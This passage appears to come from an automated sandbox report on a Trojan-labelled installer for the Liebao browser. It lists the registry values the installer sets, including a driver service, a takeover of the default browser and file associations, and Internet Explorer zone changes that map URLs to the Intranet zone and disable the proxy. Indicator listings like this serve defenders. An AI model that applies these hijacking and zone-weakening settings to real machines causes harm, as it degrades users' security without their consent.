The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\liebao]
"Report" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\liebao]
"DisplayVersion" = "4.5.34.6725"
[HKCU\Software\Kingsoft\KBROWSER]
"Report" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\liebao]
"Install Path Dir" = "%Program Files%\liebao"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\liebao]
"UninstallString" = "%Program Files%\liebao\4.5.34.6725\uninst.exe"
[HKCU\Software\Microsoft\Windows Script\Settings]
"JITDebug" = "0"
[HKLM\SOFTWARE\liebao]
"ver" = "4.5.34.6725"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\liebao\Coop]
"PreOEM" = "h_home"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\liebao]
"SPID" = "82685"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Kingsoft\KBROWSER]
"InstallTime" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\liebao]
"DisplayIcon" = "%Program Files%\liebao\4.5.34.6725\uninst.exe"
[HKLM\SOFTWARE\liebao\Coop]
"oem" = "h_home"
[HKLM\SOFTWARE\liebao]
"PID" = "66"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\System\CurrentControlSet\Services\knbcenter]
"ImagePath" = "%Program Files%\liebao\4.5.34.6725\knbcenter.exe"
[HKLM\SOFTWARE\liebao]
"hid" = "a8a67a25"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\liebao]
"InstallTime" = "0"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E 1B BE EF 3F 2B 30 3A 4A 78 B8 A0 78 B6 03 8F"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\liebao]
"Publisher" = "猎豹工作室"
"DisplayName" = "猎豹安全æµÂÂ览器"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\liebao]
"old_def_browser" = "%Program Files%\Internet Explorer\iexplore.exe -nohome"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\liebao\Coop]
"OEMName" = "h_home"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\liebao]
"URLInfoAbout" = "http://www.ijinshan.com"
The process %original file name%.exe:1264 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "48 12 33 7A 7B 09 F9 70 73 8A 1F 01 0C 7D 7E 12"
The process KNBCenter.exe:1240 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EA AD 6F 16 BF 2C A4 6E E6 5C D7 8C 78 F0 97 2A"
[HKLM\System\CurrentControlSet\Services\KNBDrv]
"ErrorControl" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\LocalService\Local Settings\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Services\KNBDrv]
"DisplayName" = "KNBDrv"
[HKCU\Software\Classes\{9B7A98EC-7EF9-468c-ACC8-37C793DBD7E0}\Implemented Categories\{A5F7140E-4311-4ef9-AABC-F55941B5EBE5}]
"svrid" = "l99zivdyl8kcx8rr2ed8snx5acet"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\liebao]
"AppDataPath" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKU\.DEFAULT\Software\Kingsoft\KBROWSER]
"vtime" = "1400765614"
[HKLM\System\CurrentControlSet\Services\KNBDrv]
"Type" = "1"
[HKLM\SOFTWARE\liebao]
"ProgramPath" = "%Program Files%\liebao\4.5.34.6725\"
[HKLM\System\CurrentControlSet\Services\KNBDrv]
"ImagePath" = "\??\%System%\drivers\KNBDrv.sys"
Automatic startup of the following service is disabled:
[HKLM\System\CurrentControlSet\Services\KNBDrv]
"Start" = "3"
The process regsvr32.exe:1536 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9F D6 D7 EF 3E E1 02 A0 BA 23 2F D6 7E A6 42 D4"
[HKCR\Interface\{6B3732AA-F6D4-4F16-9E22-49EDC52C9514}]
"(Default)" = "IDownloader_2"
[HKCR\CLSID\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\InProcServer32]
"ThreadingModel" = "Both"
[HKCR\CLSID\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}]
"(Default)" = "PSFactoryBuffer"
[HKCR\Interface\{6B3732AA-F6D4-4F16-9E22-49EDC52C9514}\ProxyStubClsid32]
"(Default)" = "{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}"
[HKCR\CLSID\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\InProcServer32]
"(Default)" = "c:\program files\common files\tencent\qqdownload\122\DownloadProxyPS.dll"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}]
"(Default)" = "IDownloader"
[HKCR\Interface\{6B3732AA-F6D4-4F16-9E22-49EDC52C9514}\NumMethods]
"(Default)" = "6"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\NumMethods]
"(Default)" = "15"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\ProxyStubClsid32]
"(Default)" = "{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}"
The process liebao.exe:1780 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FF 20 3E E7 F7 95 81 37 6F 11 C2 C7 B4 E0 9F 62"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
The process liebao.exe:516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Classes\Liebao.URL\DefaultIcon]
"(Default)" = "%Program Files%\liebao\liebao.exe,1"
[HKCU\Software\Classes\ftp\shell]
"(Default)" = "open"
[HKCR\ftp\shell\open\ddeexec\Application]
"(Default)" = ""
[HKCU\Software\Classes\Liebao.URL\shell\open\ddeexec]
"NoActivateHandler" = ""
[HKCU\Software\Clients\StartMenuInternet\liebao.exe\shell\open\command]
"(Default)" = "%Program Files%\liebao\liebao.exe"
[HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\%Program Files%\liebao]
"liebao.exe" = "猎豹安全æµÂÂ览器"
[HKCR\ftp\shell\open\command]
"(Default)" = "%Program Files%\liebao\liebao.exe %1"
[HKLM\SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice]
"Progid" = "Liebao.URL"
[HKCU\Software\Classes\CLSID\{0002DF01-0000-0000-C000-000000000046}\LocalServer32]
"(Default)" = "%Program Files%\liebao\liebao.exe"
[HKCU\Software\Clients\StartMenuInternet\liebao.exe\Capabilities]
"ApplicationIcon" = "%Program Files%\liebao\liebao.exe,1"
[HKCR\https\shell\open\command]
"(Default)" = "%Program Files%\liebao\liebao.exe %1"
[HKCU\Software\Classes\.htm]
"(Default)" = "Liebao.HTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\liebao.exe\Capabilities\URLAssociations]
"http" = "Liebao.URL"
[HKCU\Software\Classes\htmlfile\shell\open\command]
"(Default)" = "%Program Files%\Internet Explorer\iexplore.exe %1"
[HKCU\Software\Classes\Liebao.URL]
"(Default)" = "Liebao HTML Document"
[HKCU\Software\Classes\InternetShortcut\shell\open\command]
"(Default)" = "%Program Files%\Internet Explorer\iexplore.exe %1"
[HKCR\Liebao.HTML\DefaultIcon]
"(Default)" = "%Program Files%\liebao\liebao.exe,1"
[HKCU\Software\Clients\StartMenuInternet\liebao.exe\Capabilities\FileAssociations]
".html" = "Liebao.HTML"
[HKCU\Software\Classes\Liebao.HTML\shell\open\ddeexec]
"(Default)" = ""
[HKCR\Liebao.URL\shell\open\ddeexec\Application]
"(Default)" = ""
[HKCR\InternetShortcut\shell\open\command]
"(Default)" = "%Program Files%\Internet Explorer\iexplore.exe %1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\liebao.exe\Capabilities\FileAssociations]
".xhtml" = "Liebao.HTML"
".shtml" = "Liebao.HTML"
[HKCU\Software\Classes\http\shell\open\ddeexec]
"(Default)" = ""
[HKCR\Liebao.HTML\shell\open\ddeexec]
"(Default)" = ""
[HKCR\file\shell]
"(Default)" = "open"
[HKCR\CLSID\{D5E8041D-920F-45E9-B8FB-B1DEB82C6E5E}\TreatAs]
"(Default)" = "{0002DF01-0000-0000-C000-000000000046}"
[HKCU\Software\Classes\ftp]
"URL Protocol" = ""
[HKCU\Software\Classes\Liebao.HTML]
"(Default)" = "Liebao HTML Document"
[HKCU\Software\Clients\StartMenuInternet\liebao.exe\Capabilities\URLAssociations]
"ftp" = "Liebao.URL"
"https" = "Liebao.URL"
[HKCU\Software\Classes\http\shell\open\ddeexec\Topic]
"(Default)" = ""
[HKCR\.html]
"(Default)" = "Liebao.HTML"
[HKCU\Software\Classes\.xht]
"(Default)" = "Liebao.HTML"
[HKCR\https\shell\open\ddeexec\Topic]
"(Default)" = ""
[HKCU\Software\Classes\file\shell\open\command]
"(Default)" = "%Program Files%\liebao\liebao.exe %1"
[HKCR\Liebao.HTML]
"(Default)" = "Liebao HTML Document"
[HKCR\CLSID\{0002DF01-0000-0000-C000-000000000046}\LocalServer32]
"(Default)" = "%Program Files%\liebao\liebao.exe"
[HKCU\Software\Classes\.html]
"(Default)" = "Liebao.HTML"
[HKCR\HTTP\shell]
"(Default)" = "open"
[HKCU\Software\Classes\https]
"URL Protocol" = ""
[HKCU\Software\Classes\https\shell\open\ddeexec]
"(Default)" = ""
[HKCR\HTTP\shell\open\ddeexec]
"NoActivateHandler" = ""
[HKCR\.shtm]
"(Default)" = "Liebao.HTML"
[HKCU\Software\Classes\Liebao.HTML\shell\open\ddeexec]
"NoActivateHandler" = ""
[HKCR\Liebao.HTML]
"URL Protocol" = ""
[HKCR\Liebao.URL]
"URL Protocol" = ""
[HKCU\Software\Classes\http\shell\open\ddeexec\Application]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice]
"Progid" = "Liebao.URL"
[HKCR\https\shell]
"(Default)" = "open"
[HKCR\.xhtml]
"(Default)" = "Liebao.HTML"
[HKCU\Software\Classes\Liebao.URL\shell]
"(Default)" = "open"
[HKCU\Software\Clients\StartMenuInternet\liebao.exe\Capabilities]
"ApplicationName" = "猎豹安全æµÂÂ览器"
[HKCU\Software\Classes\Liebao.URL\shell\open\ddeexec\Application]
"(Default)" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\liebao.exe\Capabilities]
"ApplicationName" = "猎豹安全æµÂÂ览器"
[HKCU\Software\Clients\StartMenuInternet\liebao.exe\Capabilities\FileAssociations]
".xht" = "Liebao.HTML"
[HKCR\.htm]
"(Default)" = "Liebao.HTML"
[HKCU\Software\Classes\ftp\shell\open\command]
"(Default)" = "%Program Files%\liebao\liebao.exe %1"
[HKCR\ftp]
"URL Protocol" = ""
[HKLM\SOFTWARE\RegisteredApplications]
"liebao.exe" = "Software\Clients\StartMenuInternet\liebao.exe\Capabilities"
[HKCU\Software\Classes\Liebao.HTML\shell\open\ddeexec\Topic]
"(Default)" = ""
[HKCR\ftp\shell\open\ddeexec\Topic]
"(Default)" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\liebao.exe\Capabilities]
"ApplicationIcon" = "%Program Files%\liebao\liebao.exe,1"
[HKCR\HTTP\shell\open\ddeexec]
"(Default)" = ""
[HKCU\Software\Classes\.xhtml]
"(Default)" = "Liebao.HTML"
[HKCR\htmlfile\shell]
"(Default)" = "open"
[HKCR\https\shell\open\ddeexec]
"(Default)" = ""
[HKCU\Software\Classes\http\shell\open\ddeexec]
"NoActivateHandler" = ""
[HKCR\.mht]
"(Default)" = "Liebao.HTML"
[HKLM\SOFTWARE\Clients\StartMenuInternet\liebao.exe\Capabilities\FileAssociations]
".xht" = "Liebao.HTML"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D 55 60 41 78 CC 8B 9B EE 7C ED A9 71 E0 2E EE"
[HKCU\Software\Classes\file\shell]
"(Default)" = "open"
[HKCU\Software\Clients\StartMenuInternet\liebao.exe\Capabilities\URLAssociations]
"http" = "Liebao.URL"
[HKCU\Software\Classes\.mhtm]
"(Default)" = "Liebao.HTML"
[HKCU\Software\Classes\https\shell\open\ddeexec\Topic]
"(Default)" = ""
[HKCU\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice]
"Progid" = "Liebao.URL"
[HKCR\Liebao.HTML\shell\open\ddeexec\Topic]
"(Default)" = ""
[HKCR\Liebao.HTML\shell\open\ddeexec]
"NoActivateHandler" = ""
[HKCR\htmlfile\shell\open\command]
"(Default)" = "%Program Files%\Internet Explorer\iexplore.exe %1"
[HKCR\HTTP\shell\open\command]
"(Default)" = "%Program Files%\liebao\liebao.exe %1"
[HKCU\Software\Classes\ftp\shell\open\ddeexec]
"NoActivateHandler" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\liebao.exe\Capabilities\URLAssociations]
"https" = "Liebao.URL"
[HKCU\Software\Classes\https\shell]
"(Default)" = "open"
[HKCR\.shtml]
"(Default)" = "Liebao.HTML"
[HKCU\Software\Classes\mhtmlfile\shell]
"(Default)" = "open"
[HKCR\AppID\{0002DF01-0000-0000-C000-000000000046}]
"(Default)" = "Internet Explorer(Ver 1.0)"
[HKCU\Software\Classes\Liebao.URL\shell\open\ddeexec\Topic]
"(Default)" = ""
[HKCU\Software\Classes\.mhtml]
"(Default)" = "Liebao.HTML"
[HKCU\Software\Classes\Liebao.HTML\shell\open\command]
"(Default)" = "%Program Files%\liebao\liebao.exe %1"
[HKCU\Software\Classes\InternetShortcut\shell]
"(Default)" = "open"
[HKCU\Software\Classes\Liebao.HTML\DefaultIcon]
"(Default)" = "%Program Files%\liebao\liebao.exe,1"
[HKCR\Liebao.URL\shell\open\command]
"(Default)" = "%Program Files%\liebao\liebao.exe %1"
[HKCU\Software\Classes\ftp\shell\open\ddeexec\Topic]
"(Default)" = ""
[HKCU\Software\Classes\http\shell]
"(Default)" = "open"
[HKCR\HTTP\shell\open\ddeexec\Topic]
"(Default)" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\liebao.exe\Capabilities]
"ApplicationDescription" = "猎豹安全æµÂÂ览器是çâ€Â±é‡‘山网络历æâ€â€Ã‚¶Ã¥ÂŠ年多开å‘ã€ÂÂ推出的主打安全与æžÂÂ速特性的æµÂÂ览器,界é¢炫酷,采çâ€Â¨Tridentå’ŒWebKitåŒ渲染引擎,并整åˆ金山自家的BIPS进行安全防护。猎豹安全æµÂÂ览器对Chromeçš„Webkit内核进行了超过100项的技术优化,使访éâ€â€Ã‚®Ã§Â½â€˜Ã©Â¡ÂµÃ§Å¡â€žÃ©â‚¬Å¸Ã¥ÂºÂ¦Ã¦â€ºÂ´Ã¥Â¿Â«Ã£â‚¬â€šÃ¥â€¦Â¶Ã¥â€¦Â·Ã¦Å“‰é¦–创的智能切æÂ¢引擎,动æ€ÂÂ选择内核匹é…ÂÂä¸ÂÂåŒ网页,并ä¸â€Â完美æâ€Â¯æŒÂÂHTML5新国际网页标准。æžÂÂ速æµÂÂ览的åÂÂξâ€â€Ã‚¶Ã¤Â¹Å¸Ã¥â€¦â€¦Ã¥Ë†â€ Ã¤Â¿ÂÂè¯ÂÂ兼容性。"
[HKCR\https\shell\open\ddeexec]
"NoActivateHandler" = ""
[HKCR\Liebao.URL\shell]
"(Default)" = "open"
[HKCU\Software\Clients\StartMenuInternet\liebao.exe]
"(Default)" = "猎豹安全æµÂÂ览器"
[HKCU\Software\Classes\http]
"URL Protocol" = ""
[HKCR\https]
"URL Protocol" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\liebao.exe\Capabilities\FileAssociations]
".html" = "Liebao.HTML"
[HKCU\Software\Classes\.shtml]
"(Default)" = "Liebao.HTML"
[HKCR\HTTP]
"URL Protocol" = ""
[HKCR\.mhtm]
"(Default)" = "Liebao.HTML"
[HKCU\Software\Classes\Liebao.HTML\shell\open\ddeexec\Application]
"(Default)" = ""
[HKCU\Software\Classes\Liebao.URL\shell\open\ddeexec]
"(Default)" = ""
[HKCR\Liebao.URL\shell\open\ddeexec\Topic]
"(Default)" = ""
[HKCU\Software\Clients\StartMenuInternet\liebao.exe\Capabilities]
"ApplicationDescription" = "猎豹安全æµÂÂ览器是çâ€Â±é‡‘山网络历æâ€â€Ã‚¶Ã¥ÂŠ年多开å‘ã€ÂÂ推出的主打安全与æžÂÂ速特性的æµÂÂ览器,界é¢炫酷,采çâ€Â¨Tridentå’ŒWebKitåŒ渲染引擎,并整åˆ金山自家的BIPS进行安全防护。猎豹安全æµÂÂ览器对Chromeçš„Webkit内核进行了超过100项的技术优化,使访éâ€â€Ã‚®Ã§Â½â€˜Ã©Â¡ÂµÃ§Å¡â€žÃ©â‚¬Å¸Ã¥ÂºÂ¦Ã¦â€ºÂ´Ã¥Â¿Â«Ã£â‚¬â€šÃ¥â€¦Â¶Ã¥â€¦Â·Ã¦Å“‰é¦–创的智能切æÂ¢引擎,动æ€ÂÂ选择内核匹é…ÂÂä¸ÂÂåŒ网页,并ä¸â€Â完美æâ€Â¯æŒÂÂHTML5新国际网页标准。æžÂÂ速æµÂÂ览的åÂÂξâ€â€Ã‚¶Ã¤Â¹Å¸Ã¥â€¦â€¦Ã¥Ë†â€ Ã¤Â¿ÂÂè¯ÂÂ兼容性。"
[HKCR\.mhtml]
"(Default)" = "Liebao.HTML"
[HKCR\Liebao.HTML\shell\open\ddeexec\Application]
"(Default)" = ""
[HKCU\Software\Classes\AppID\{0002DF01-0000-0000-C000-000000000046}]
"(Default)" = "Internet Explorer(Ver 1.0)"
[HKCR\file\shell\open\command]
"(Default)" = "%Program Files%\liebao\liebao.exe %1"
[HKCU\Software\Classes\htmlfile\shell]
"(Default)" = "open"
[HKCU\Software\Classes\mhtmlfile\shell\open\command]
"(Default)" = "%Program Files%\Internet Explorer\iexplore.exe %1"
[HKCU\Software\Classes\Liebao.URL]
"URL Protocol" = ""
[HKCU\Software\TENCENT\Traveler]
"EXE" = "%Program Files%\liebao\liebao.exe"
[HKCU\Software\Classes\.mht]
"(Default)" = "Liebao.HTML"
[HKCR\HTTP\shell\open\ddeexec\Application]
"(Default)" = ""
[HKLM\SOFTWARE\TENCENT\Traveler]
"EXE" = "%Program Files%\liebao\liebao.exe"
[HKCR\mhtmlfile\shell]
"(Default)" = "open"
[HKCR\Liebao.URL]
"(Default)" = "Liebao HTML Document"
[HKCU\Software\Classes\.shtm]
"(Default)" = "Liebao.HTML"
[HKCU\Software\Classes\ftp\shell\open\ddeexec]
"(Default)" = ""
[HKCU\Software\Classes\Liebao.HTML\shell]
"(Default)" = "open"
[HKCU\Software\Clients\StartMenuInternet\liebao.exe\Capabilities\FileAssociations]
".shtml" = "Liebao.HTML"
[HKCU\Software\Classes\CLSID\{D5E8041D-920F-45E9-B8FB-B1DEB82C6E5E}\TreatAs]
"(Default)" = "{0002DF01-0000-0000-C000-000000000046}"
[HKCR\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\%Program Files%\liebao]
"liebao.exe" = "猎豹安全æµÂÂ览器"
[HKLM\SOFTWARE\Clients\StartMenuInternet\liebao.exe\Capabilities\URLAssociations]
"ftp" = "Liebao.URL"
[HKLM\SOFTWARE\Clients\StartMenuInternet]
"(Default)" = "liebao.exe"
[HKCU\Software\Clients\StartMenuInternet\liebao.exe\Capabilities\FileAssociations]
".xhtml" = "Liebao.HTML"
[HKCU\Software\Classes\https\shell\open\ddeexec]
"NoActivateHandler" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\liebao.exe]
"(Default)" = "猎豹安全æµÂÂ览器"
[HKCU\Software\RegisteredApplications]
"liebao.exe" = "Software\Clients\StartMenuInternet\liebao.exe\Capabilities"
[HKCR\Liebao.HTML\shell\open\command]
"(Default)" = "%Program Files%\liebao\liebao.exe %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\Classes\Liebao.HTML]
"URL Protocol" = ""
[HKCR\ftp\shell\open\ddeexec]
"(Default)" = ""
[HKCR\Liebao.URL\shell\open\ddeexec]
"NoActivateHandler" = ""
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\ftp\UserChoice]
"Progid" = "Liebao.URL"
[HKCU\Software\Classes\https\shell\open\ddeexec\Application]
"(Default)" = ""
[HKCR\ftp\shell]
"(Default)" = "open"
[HKCR\InternetShortcut\shell]
"(Default)" = "open"
[HKCR\Liebao.URL\DefaultIcon]
"(Default)" = "%Program Files%\liebao\liebao.exe,1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\liebao.exe\Capabilities\FileAssociations]
".htm" = "Liebao.HTML"
[HKCU\Software\Classes\Liebao.URL\shell\open\command]
"(Default)" = "%Program Files%\liebao\liebao.exe %1"
[HKCR\https\shell\open\ddeexec\Application]
"(Default)" = ""
[HKCR\.xht]
"(Default)" = "Liebao.HTML"
[HKCU\Software\Classes\ftp\shell\open\ddeexec\Application]
"(Default)" = ""
[HKCU\Software\Clients\StartMenuInternet\liebao.exe\Capabilities\FileAssociations]
".htm" = "Liebao.HTML"
[HKCR\mhtmlfile\shell\open\command]
"(Default)" = "%Program Files%\Internet Explorer\iexplore.exe %1"
[HKCR\ftp\shell\open\ddeexec]
"NoActivateHandler" = ""
[HKCU\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\ftp\UserChoice]
"Progid" = "Liebao.URL"
[HKCU\Software\Clients\StartmenuInternet]
"(Default)" = "liebao.exe"
[HKCU\Software\Classes\https\shell\open\command]
"(Default)" = "%Program Files%\liebao\liebao.exe %1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\liebao.exe\shell\open\command]
"(Default)" = "%Program Files%\liebao\liebao.exe"
[HKCU\Software\Classes\http\shell\open\command]
"(Default)" = "%Program Files%\liebao\liebao.exe %1"
[HKCR\Liebao.HTML\shell]
"(Default)" = "open"
[HKCU\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice]
"Progid" = "Liebao.URL"
The process down_s_66_82685.exe:1988 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\liebao]
"UID" = "3c5f6e2b73049b0ecc3362e627a51fa3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D2 D9 BF FE 0E 04 BC E1 BC 7C 6C CD 9F 39 6E 5D"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Kingsoft\KBROWSER]
"vtime" = "1400765523"
[HKCR\CLSID\{DA3CB2BC-1CCA-412d-BC7C-4DFB532D2223}\Implemented Categories\{D7BD91AA-CB34-4eae-A9D1-2DB9A7C6815C}]
"UID" = "3c5f6e2b73049b0ecc3362e627a51fa3"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process ping.exe:972 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
